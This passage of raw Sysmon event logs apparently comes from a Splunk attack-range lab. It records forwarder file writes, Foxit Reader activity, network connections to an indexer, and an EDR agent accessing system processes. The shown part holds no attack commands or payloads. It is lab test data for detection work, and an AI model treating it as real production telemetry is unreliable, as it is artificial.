12:19:06.793{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F787612556D50737FBAE50927465A730,SHA256=F1ECCA227C2E0BF75793ADE4231F3476C3253C0DB6F90D874618AE5B36B4A885,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000040874Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:06.610{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E463BD621DE5D1D9E2F92D0B604F6DF,SHA256=58AC2018FCCD57E82FE119B1AFB37D365620E5C47593059F0F13AEEB37A07486,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015693Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:07.867{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E5DAFF3B2C60B212EE700D8B7049CAF,SHA256=A557F424A153DC9F6A31C94185A2C8DD21E10F8A2484E5AEBAC37995AA2661D7,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000015692Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:06.127{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50062-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000040875Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:07.682{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D0A89CA1E1552F3CA8D5A121C3435F46,SHA256=A72A4566D83880274573D534FB43A9D9F6AC3788CC464A7DECF5F763A34A8B2B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015694Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:08.957{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A007411C2949BD8B1C798660E8D7E7A5,SHA256=475293D76404E448E305FA8552866B9A6ED2FA12D1418B9FE6511F38F6DB27CA,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000040877Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:06.697{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56258-false10.0.1.12-8000- 23542300x800000000000000040876Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:08.764{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3D47CCEF6BB0B356C7D6CDEB252224F,SHA256=56763BAA7EFBB90B7A37477AF7ADACEA897A2230DB4B5BC4CBF9717D4707AAFA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000040878Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:09.831{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F93118A583AACD2F525C0DB0879BB122,SHA256=BEF63EBE87059D74F35AAF647D988F6E2612A4E620232CDBE553625035EF9662,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000040879Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:10.923{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB249A4D72A71DCD5C4775EB708B1D80,SHA256=3A260AF291734B09E927677775663E57D765E80A4DE4B4DA38B881FFC1353387,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015695Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:10.048{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D5AAE293A09BD5049CF51EDFFB88742,SHA256=1E03C44A37C168808550F85F30A01B2087072A8844C18C03DC6D656AAE8BC75E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000015696Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:11.134{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3AEFA8FB6D3A11D40D4BAD271D8C8EE3,SHA256=D65EE49A5E32ED0FE802E79D06B14091B8303D3B7654EF3A0F8E0DF8A993D5BF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000040906Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:11.884{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\system32\dns.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040905Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:11.882{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2400-00000000AF02}2492C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040904Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:11.877{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040903Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:11.875{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2200-00000000AF02}2476C:\Windows\System32\ismserv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040902Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:11.871{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040901Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:11.855{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1F00-00000000AF02}2444C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040900Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:11.850{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040899Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:11.844{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1E00-00000000AF02}2352C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040898Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:11.841{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9FF-63C7-1C00-00000000AF02}2208C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040897Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:11.840{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F6-63C7-1A00-00000000AF02}1436C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040896Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:11.838{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1700-00000000AF02}1412C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 23542300x800000000000000040895Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:11.833{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\Administrator\AppData\Roaming\Foxit Software\Foxit PDF Reader\StartPage 12.1.0\Advertisement\ad.db-journalMD5=D55DF38FD64A21F60293E02424C7A3B8,SHA256=0B6C28D7B6409B6571B627B0DBA6E93BBA5757F9E487F6EE38022A9EE011D93F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000040894Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:11.833{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\ADMINI~1\AppData\Local\Temp\etilqs_OAMjnvcZplF4RjmMD5=9659E654B45026A06047B596A2C5B3F2,SHA256=AE31E85FFCBAB2848C1051EB9B1B37C340F560AD93CA1EE7FB18386A897FCB81,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000040893Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:11.822{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\Administrator\AppData\Roaming\Foxit Software\Foxit PDF Reader\StartPage 12.1.0\Advertisement\ad.db-journalMD5=B9AD573AD60CE031C159A81D90F89442,SHA256=7DEF5CB9002F0D0551385BBFFE4BB3DB06592E58C82B315F48B0E45F69E8A7F0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000040892Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:11.815{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040891Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:11.810{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1500-00000000AF02}1268C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040890Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:11.806{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1400-00000000AF02}1060C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040889Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:11.795{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1300-00000000AF02}1036C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040888Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:11.788{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1200-00000000AF02}756C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040887Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:11.782{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1100-00000000AF02}492C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040886Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:11.775{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1000-00000000AF02}404C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040885Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:11.766{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0F00-00000000AF02}304C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040884Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:11.760{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0E00-00000000AF02}1004C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040883Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:11.743{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000040882Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:11.735{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program 